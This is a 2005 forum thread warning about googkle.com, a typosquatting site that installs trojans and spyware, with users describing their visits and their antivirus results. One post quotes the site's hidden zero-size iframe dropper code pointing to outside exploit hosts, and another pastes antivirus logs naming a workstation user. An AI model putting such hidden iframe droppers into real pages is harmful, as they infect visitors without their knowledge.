check out this site, if you mispell google while typing the url you may get this well dodgy looking site that instantly installs at least 5 trojans and various bits of spyware.
http://www.f-secure.com/v-descs/googkle.shtml

presumably then we aren't supposed to click on the link to the 'dodgy looking site'....??:confused:

The link is quite safe...it directs you a page of information regarding the dodgy site, not the dodgy site itself.

Er ....check it out? Think not.

its safe Robbo dearest - I checked after reading Abdul's post (trusting aint I???)

oooh im well known at college for my typing mistakes and i think I would take the cake if i opened that 1 on their already dodgy network :hihi:

anyone else tempted to go to googkle?

hahaha yea im tempted... i think i'll go back to the press the red button thread to try and ease my curiousity,

interesting.

I've added it to my restricted sites list (under tools, options, security) just in case i ever mistype google.

A pop-up blocker should actually render the site safe as the explanation says that the process starts with 2 pop up windows being opened which download the first exploits.

Well, all tanked up with ad-aware, spyware s&d, a fully up-to-date AVG, McAfee Personal Firewall, and stupidity, I just visited googkle.com, and expecting to see loads of windows telling me that so-and-so trojan has been blocked, I actually see nothing.

Maybe the threat has gone now? :suspect:

Originally posted by Cyclone
A pop-up blocker should actually render the site safe as the explanation says that the process starts with 2 pop up windows being opened which download the first exploits.
Actually, that would explain it, I ought to read things first. Good ol' Firefox! ;)

Originally posted by 21steve
anyone else tempted to go to googkle?



I've just been and visited it;).


No infections here....(Thankyou Firefox);).


FTR. The site is based on the CoolWebSearch database, and uses an iframe to drop the exploits:


exploit dropper:


<IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src="http://www.ntsearch.com/popengine/popup3.htm" width=0></iframe>
<iframe src="http://toolbarpartner.com/in.php?wm=Zergio" width="0" height="0"></iframe>


The URL in bold is the exploit dropper page which contains more iframes:


<IFRAME SRC="http://toolbarpartner.com/adverts/Zergio/index3.html" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>
<IFRAME SRC="http://toolbarpartner.com/adverts/Zergio/index2.html" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>
<IFRAME SRC="http://toolbarpartner.com/adverts/Zergio/indexchm.html" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>
<IFRAME SRC="http://toolbarpartner.com/cookies2.php" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>


Can't be bothered to go any deeper @ the moment, maybe later;).



If anyone wants to go, make sure you have decent protection;)...

Originally posted by Sidla
Well, all tanked up with ad-aware, spyware s&d, a fully up-to-date AVG, McAfee Personal Firewall, and stupidity, I just visited googkle.com,

I'm going to go visit from my Linux box. Should be quite safe ;)

Originally posted by spiffymonkey
I'm going to go visit from my Linux box. Should be quite safe ;)


Coward;).


I went with ye olde Win 98:o


Then went deeper & still got nothing....



I wouldn't advocate visiting using IE though;)..

Just been on from work PC! Good old Norton!

Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: MHTMLRedir.Exploit
File: C:\Documents and Settings\jonathan.price\Local Settings\Temporary Internet Files\Content.IE5\720VFH05\popup3[1].htm
Location: Quarantine
Computer: NHSDEVWS248
User: jonathan.price
Action taken: Clean failed : Quarantine succeeded : Access denied
Date found: Thu Apr 28 14:11:02 2005

Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Downloader.Trojan
File: C:\Documents and Settings\jonathan.price\Local Settings\Temporary Internet Files\Content.IE5\0DUZK16V\frame[1].exe
Location: Quarantine
Computer: NHSDEVWS248
User: jonathan.price
Action taken: Clean failed : Quarantine succeeded : Access denied
Date found: Thu Apr 28 14:11:21 2005

etc etc etc....

hehe i knew i couldnt resist it... college network detected it and stopped it no problem :o it did better than i expected

ok so i wasnt the only one tempted.

firefox did make it a rather boring affair tho!

You guys with Nav. Don't get complacent. ;-)
This site does a lot more than attempt to infect you with MHTMLRedir.Exploit and Downloader.trojan.

I accessed the site using the latest Nav/Sav defs., got the same NAV events as yourselves, and yet still managed to pick up the following....

Bloodhound Exploit ActiveX Trojan Adware
CoolWebSearch.ntsearch Browser Modifier
IST.SlotchBar Toolbar
RealVNC Remote Control Software

Originally posted by redrobbo
Er ....check it out? Think not.

LOL fscure is an anti virus / security site that lets us know the new nasties on the block :)